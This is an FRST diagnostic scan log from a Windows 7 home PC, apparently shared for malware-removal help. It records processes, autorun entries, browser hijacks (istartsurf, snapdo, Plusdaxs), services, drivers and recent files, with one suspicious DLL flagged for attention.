FRST log:
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 22-04-2017
Ran by HP (administrator) on HP-PC (22-04-2017 16:55:45)
Running from C:\Users\HP\Desktop
Loaded Profiles: HP (Available Profiles: HP)
Platform: Windows 7 Professional (X64) Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.3\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.3\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(BitTorrent Inc.) C:\Users\HP\AppData\Roaming\uTorrent\uTorrent.exe
(Skillbrains) C:\Program Files (x86)\Skillbrains\lightshot\5.3.0.0\Lightshot.exe
(BitTorrent Inc.) C:\Users\HP\AppData\Roaming\uTorrent\updates\3.4.9_43388\utorrentie.exe
(BitTorrent Inc.) C:\Users\HP\AppData\Roaming\uTorrent\updates\3.4.9_43388\utorrentie.exe
() C:\Program Files\AutoHotkey\AutoHotkey.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Registry (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [1337000 2015-04-30] (Microsoft Corporation)
HKLM-x32\...\Run: [Lightshot] => C:\Program Files (x86)\Skillbrains\lightshot\Lightshot.exe [226560 2014-10-16] ()
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation)
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [55357464 2015-09-04] (Skype Technologies S.A.)
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [uTorrent] => C:\Users\HP\AppData\Roaming\uTorrent\uTorrent.exe [2147520 2017-03-14] (BitTorrent Inc.)
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3019552 2017-03-23] (Valve Corporation)
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [RGSC] => C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe /silent
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Discord] => C:\Users\HP\AppData\Local\Discord\app-0.0.297\Discord.exe
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Etzption] => regsvr32.exe C:\Users\HP\AppData\Local\Etzption\kgnxycpl.dll <===== ATTENTION
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\MountPoints2: F - F:\Setup.exe
HKU\S-1-5-18\...\Run: [oALSusVMb8.exe] => C:\Program Files\MSBuild\TFEMS13WF30E\oALSusVMb8.exe [444928 2017-04-21] (tachba3)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 41.212.0.100 41.212.0.101
Tcpip\..\Interfaces\{4ED56D3C-8DAE-4F80-93CC-907F3CAC181A}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{4ED56D3C-8DAE-4F80-93CC-907F3CAC181A}: [DhcpNameServer] 41.212.0.100 41.212.0.101
Tcpip\..\Interfaces\{7E37DC77-5ECC-4B66-8019-685EFD3768FB}: [DhcpNameServer] 41.212.0.100 41.212.0.101
Internet Explorer:
==================
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
SearchScopes: HKLM-x32 -> DefaultScope value is missing
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-10-22] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-10-22] (Oracle Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.istartsurf.com/?type=sc&ts=1442127735&z=8f6c8bea7b47c1abc4c3a41g0z6z1o2g1o8m5wdm1b&from=cor&uid=WDCXWD5000LPVX-60V0TT0_WD-WX61AB404E2U04E2U
FireFox:
========
FF DefaultProfile: 48lgjav6.default
FF ProfilePath: C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\48lgjav6.default [2017-04-21]
FF Homepage: Mozilla\Firefox\Profiles\48lgjav6.default -> C:\ProgramData\Plusdaxs\ff.HP
FF NewTab: Mozilla\Firefox\Profiles\48lgjav6.default -> C:\ProgramData\Plusdaxs\ff.NT
FF Extension: (System.Runtime.InteropServices.ComRegisterFunctionAttribute) - C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\48lgjav6.default\Extensions\{63086783-BD70-059F-3F70-5CF11841DE4D} [2017-04-21] [not signed]
FF SearchPlugin: C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\48lgjav6.default\searchplugins\findit.xml [2017-04-21]
FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-10-22] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-10-22] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [No File]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1988295413-3700943990-1798627009-1000: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [No File]
Chrome:
=======
CHR HomePage: Default -> hxxps://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWoBGdpVDR-BTSrQsGi8yyr8td-LCWCtYq86UsssjajJ8KKld5TANCXyBiNR4ojSWvV34p5tmV7J1vo8MahiLaLWxx2yyMLKa9s7rWriIZxYDWkmExYEPhxkurmILopi0NJUDP3alUzvEqs6VY743GvE6pqAiXqcBAUFopR6Xo
CHR NewTab: Default -> Active:"chrome-extension://jpfpebmajhhopeonhlcgidhclcccjcik/newtab.html"
CHR Profile: C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default [2017-04-22]
CHR Extension: (Google Slides) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-04-07]
CHR Extension: (Google Docs) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-04-07]
CHR Extension: (Adblock Plus) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-04-07]
CHR Extension: (Adobe Acrobat) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-04-07]
CHR Extension: (Google Sheets) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-04-07]
CHR Extension: (Google Docs Offline) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-04-07]
CHR Extension: (Speed Dial 2) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2017-04-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-04-07]
CHR Extension: (Material Simple Dark Grey) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\ookepigabmicjpgfnmncjiplegcacdbm [2017-04-21]
CHR Extension: (Gmail) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-04-07]
CHR Extension: (Chrome Media Router) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-07]
CHR Extension: (Canvas Rider) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\poknhlcknimnnbfcombaooklofipaibk [2017-04-07]
CHR HKU\.DEFAULT\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [236832 2015-10-21] (EasyAntiCheat Ltd)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [282096 2014-02-24] (Intel Corporation)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 atksgt; C:\Windows\System32\DRIVERS\atksgt.sys [303616 2017-02-25] () [File not signed]
R3 btUrbFilterDrv; C:\Windows\System32\Drivers\IvtUrbBtFlt.sys [50272 2013-12-16] (Ralink Corporation)
R2 lirsgt; C:\Windows\System32\DRIVERS\lirsgt.sys [43168 2015-09-26] ()
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [100312 2013-12-10] (Intel Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation)
R3 RSP2STOR; C:\Windows\System32\DRIVERS\RtsP2Stor.sys [293592 2014-04-16] (Realtek Semiconductor Corp.)
R3 rtbth; C:\Windows\System32\DRIVERS\rtbth.sys [1205448 2014-04-30] (Ralink Technology, Corp.)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [31472 2014-05-05] (Synaptics Incorporated)
R1 {df06148f-d289-4e33-a087-33e2aa940789}Gw64; C:\Windows\System32\drivers\{df06148f-d289-4e33-a087-33e2aa940789}Gw64.sys [48784 2015-09-12] () [File not signed]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-04-22 16:55 - 2017-04-22 16:56 - 00016273 _____ C:\Users\HP\Desktop\FRST.txt
2017-04-22 16:55 - 2017-04-22 16:55 - 00000000 ____D C:\FRST
2017-04-22 16:54 - 2017-04-22 16:55 - 02425344 _____ (Farbar) C:\Users\HP\Desktop\FRST64.exe
2017-04-22 12:30 - 2017-04-22 12:30 - 00000000 ____D C:\ProgramData\Electronic Arts
2017-04-21 15:44 - 2017-04-21 15:44 - 00001220 _____ C:\Users\HP\Desktop\OBS Studio (32bit).lnk
2017-04-21 15:41 - 2017-04-21 21:26 - 00000000 ____D C:\Users\HP\AppData\Roaming\obs-studio
2017-04-21 15:40 - 2017-04-21 15:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OBS Studio
2017-04-21 15:39 - 2017-04-21 15:40 - 00000000 ____D C:\Program Files (x86)\obs-studio
2017-04-21 08:51 - 2017-04-22 08:31 - 00000000 ____D C:\Program Files (x86)\pccleanplus
2017-04-21 08:51 - 2017-04-21 08:51 - 00000037 _____ C:\Windows\wininit.ini
2017-04-21 08:50 - 2017-04-21 08:50 - 00000000 ____D C:\Program Files (x86)\ParentalControl
2017-04-21 08:45 - 2017-04-22 08:31 - 00000000 ____D C:\Program Files (x86)\51dc062d-c4d5-4a36-8902-edc3d32064671492753523
2017-04-19 16:18 - 2017-04-19 16:18 - 00000000 ____D C:\Users\HP\AppData\Local\modloader
2017-04-19 10:41 - 2017-04-22 13:43 - 00061811 _____ C:\Windows\icm32.exe
2017-04-19 10:41 - 2017-04-19 10:41 - 00003320 _____ C:\Windows\System32\Tasks\RegIdleBackup
2017-04-08 18:58 - 2017-04-12 06:46 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-04-08 18:58 - 2017-04-12 06:46 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-08 18:58 - 2017-04-12 06:46 - 00004462 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier
2017-04-08 18:58 - 2017-04-12 06:46 - 00004324 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-04-08 18:57 - 2017-04-12 06:45 - 00000000 ____D C:\Windows\system32\Macromed
2017-04-07 21:35 - 2017-04-07 22:06 - 00001708 _____ C:\Users\Public\Desktop\League of Legends.lnk
2017-04-07 21:35 - 2017-04-07 21:35 - 00000000 ____D C:\Riot Games
2017-04-07 21:35 - 2017-04-07 21:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends
2017-04-07 20:02 - 2017-04-22 08:19 - 00002356 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-04-07 19:59 - 2017-04-12 06:46 - 00003330 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2017-04-07 19:59 - 2017-04-12 06:46 - 00003202 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2017-04-07 18:55 - 2017-04-07 18:55 - 00000000 ____D C:\Users\HP\AppData\Local\CrashDumps
2017-04-07 17:33 - 2017-04-07 17:33 - 00000000 ____D C:\Users\HP\AppData\Roaming\Opera Software
2017-04-07 13:20 - 2017-04-07 13:20 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-04-07 07:36 - 2017-04-22 08:56 - 00000000 ____D C:\Users\HP\AppData\LocalLow\uTorrent
2017-04-02 12:38 - 2015-07-02 12:05 - 00218112 _____ C:\Users\HP\Desktop\IMRP.Launcher.exe
2017-03-28 11:07 - 2017-04-07 19:53 - 00000000 ____D C:\Program Files (x86)\Mr DJ
2017-03-25 13:57 - 2017-03-25 13:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerISO
2017-03-25 13:14 - 2017-03-25 13:53 - 00000000 ____D C:\Users\HP\AppData\LocalLow\Mozilla
2017-03-25 13:14 - 2017-03-25 13:19 - 00000000 ____D C:\Users\HP\AppData\Local\Mozilla
2017-03-25 13:14 - 2017-03-25 13:14 - 00000000 ____D C:\Users\HP\AppData\Roaming\Mozilla
2017-03-23 16:26 - 2017-04-07 17:48 - 00000000 ____D C:\Users\HP\AppData\Local\Opera Software
2017-03-23 16:24 - 2017-03-23 16:31 - 00000000 ____D C:\Program Files\Opera
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-04-22 16:56 - 2015-10-25 08:09 - 00000000 ____D C:\Users\HP\AppData\Roaming\uTorrent
2017-04-22 16:53 - 2015-10-31 18:13 - 00000000 ____D C:\Program Files (x86)\Steam
2017-04-22 16:34 - 2015-11-19 19:41 - 00000382 _____ C:\Windows\Tasks\update-sys.job
2017-04-22 15:43 - 2015-11-19 19:41 - 00000382 _____ C:\Windows\Tasks\update-S-1-5-21-1988295413-3700943990-1798627009-1000.job
2017-04-22 12:57 - 2015-09-21 16:58 - 00000000 ____D C:\Users\HP\Documents\FIFA 14
2017-04-22 09:03 - 2009-07-14 07:45 - 00020688 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-04-22 09:03 - 2009-07-14 07:45 - 00020688 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-04-22 08:56 - 2009-07-14 08:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-22 08:38 - 2015-09-12 19:41 - 00000000 ____D C:\Users\HP\AppData\Roaming\Skype
2017-04-22 08:37 - 2015-09-12 07:17 - 00001170 _____ C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-04-22 08:37 - 2015-09-12 07:17 - 00000983 _____ C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2017-04-22 08:11 - 2015-09-28 09:30 - 00000000 ____D C:\Users\HP\AppData\Roaming\vlc
2017-04-21 20:02 - 2015-10-12 17:31 - 00000000 ____D C:\ProgramData\Package Cache
2017-04-21 08:51 - 2009-07-14 08:32 - 00000000 ____D C:\Program Files\MSBuild
2017-04-19 21:42 - 2016-12-14 13:49 - 00000000 ____D C:\Users\HP\Desktop\Backups
2017-04-19 07:57 - 2015-09-24 16:14 - 00000000 ____D C:\Users\HP\AppData\Local\Steam
2017-04-14 09:36 - 2015-12-30 14:59 - 00001019 _____ C:\Users\HP\Desktop\sprint binds.txt
2017-04-12 06:45 - 2015-09-19 15:17 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-04-11 15:09 - 2016-02-04 18:11 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-04-11 15:08 - 2016-02-04 18:10 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-04-08 18:58 - 2016-02-04 18:07 - 00000000 ____D C:\Users\HP\AppData\Local\Adobe
2017-04-08 01:06 - 2015-09-12 18:45 - 00532136 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2017-04-07 21:36 - 2016-07-09 10:13 - 00000000 ____D C:\Users\HP\AppData\Roaming\Riot Games
2017-04-07 20:01 - 2015-09-12 18:28 - 00000000 ____D C:\Program Files (x86)\Google
2017-04-07 19:59 - 2015-09-12 18:27 - 00000000 ____D C:\Users\HP\AppData\Local\Deployment
2017-04-07 19:54 - 2015-09-12 07:16 - 00000000 ___HD C:\Users\HP
2017-04-07 19:53 - 2017-02-03 18:42 - 00000000 ____D C:\Users\HP\AppData\Local\Discord
2017-04-07 19:53 - 2015-09-19 12:36 - 00000000 ____D C:\Users\HP\AppData\Roaming\Mumble
2017-04-07 19:53 - 2009-07-14 06:20 - 00000000 ____D C:\Windows\inf
2017-04-07 19:52 - 2015-09-12 18:28 - 00000000 ____D C:\Users\HP\AppData\Local\Google
2017-04-07 19:52 - 2009-07-14 06:20 - 00000000 ____D C:\Windows\registration
2017-04-07 19:51 - 2016-06-12 16:49 - 00000000 ____D C:\Games
2017-04-04 16:22 - 2015-09-13 10:02 - 00000000 ____D C:\Program Files\PowerISO
2017-04-03 20:08 - 2009-07-14 06:20 - 00000000 ____D C:\Windows\system32\NDF
2017-03-28 11:07 - 2015-09-16 19:47 - 00000000 ____D C:\Windows\SysWOW64\directx
2017-03-25 17:32 - 2015-09-13 08:44 - 00000000 ____D C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games
2017-03-25 13:57 - 2015-09-13 10:02 - 00000812 _____ C:\Users\Public\Desktop\PowerISO.lnk
==================== Files in the root of some directories =======
2015-10-24 13:43 - 2016-10-07 20:59 - 0007605 _____ () C:\Users\HP\AppData\Local\Resmon.ResmonCfg
2015-11-19 19:41 - 2015-11-19 19:41 - 0000003 _____ () C:\Users\HP\AppData\Local\updater.log
2015-11-19 19:41 - 2015-11-19 19:42 - 0000059 _____ () C:\Users\HP\AppData\Local\UserProducts.xml
Some files in TEMP:
====================
2006-10-17 08:20 - 2006-10-17 08:20 - 0569344 _____ (Electronic Arts Inc.) C:\Users\HP\AppData\Local\Temp\AutoRun.exe
2015-09-19 15:15 - 2006-10-13 11:01 - 0528384 _____ (Electronic Arts Inc.) C:\Users\HP\AppData\Local\Temp\AutoRunGUI.dll
2013-08-05 09:15 - 2013-08-05 09:15 - 4292136 _____ (www.Bandisoft.com) C:\Users\HP\AppData\Local\Temp\bdfilters.dll
2016-09-06 17:13 - 2016-09-06 17:13 - 7850088 _____ (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\BingBarSetup-Partner.exe
2017-03-13 16:49 - 2004-09-20 12:27 - 0040960 _____ () C:\Users\HP\AppData\Local\Temp\comver.dll
2011-03-30 11:40 - 2011-03-30 11:40 - 0095576 _____ (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\DSETUP.dll
2011-03-30 11:40 - 2011-03-30 11:40 - 1566040 _____ (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\dsetup32.dll
2011-03-30 11:40 - 2011-03-30 11:40 - 0517976 _____ (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\DXSETUP.exe
2015-09-19 15:15 - 2006-10-13 11:01 - 0720896 _____ () C:\Users\HP\AppData\Local\Temp\EAInstall.dll
2015-09-19 15:43 - 2006-10-17 08:20 - 0253952 _____ (Electronic Arts Inc.) C:\Users\HP\AppData\Local\Temp\eauninstall.exe
2017-03-13 17:08 - 1999-06-25 10:55 - 0149504 _____ () C:\Users\HP\AppData\Local\Temp\GLB1A2B.EXE
2015-09-27 17:31 - 2015-09-29 20:55 - 0035680 _____ () C:\Users\HP\AppData\Local\Temp\i4jdel1.exe
2015-09-19 15:43 - 2006-09-23 09:10 - 0073728 _____ (Electronic Arts Inc.) C:\Users\HP\AppData\Local\Temp\Need for Speed Carbon_uninst.exe
2012-10-01 15:22 - 2012-10-01 15:22 - 0150648 ____R (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\ose00002.exe
2017-04-20 10:04 - 2017-04-20 10:04 - 0049152 _____ (Alienware) C:\Users\HP\AppData\Local\Temp\sansevierias.dll
2016-02-21 19:25 - 2016-02-21 19:28 - 47347840 _____ (Skype Technologies S.A.) C:\Users\HP\AppData\Local\Temp\SkypeSetup.exe
2016-07-01 19:58 - 2016-07-01 19:59 - 0696832 ____N () C:\Users\HP\AppData\Local\Temp\sqlite-3.8.10.1-19805034-23e3-480e-803b-cbdc2f7d3ffb-sqlitejdbc.dll
2015-10-31 17:46 - 2016-12-28 18:46 - 0116777 _____ () C:\Users\HP\AppData\Local\Temp\Uninstall.exe
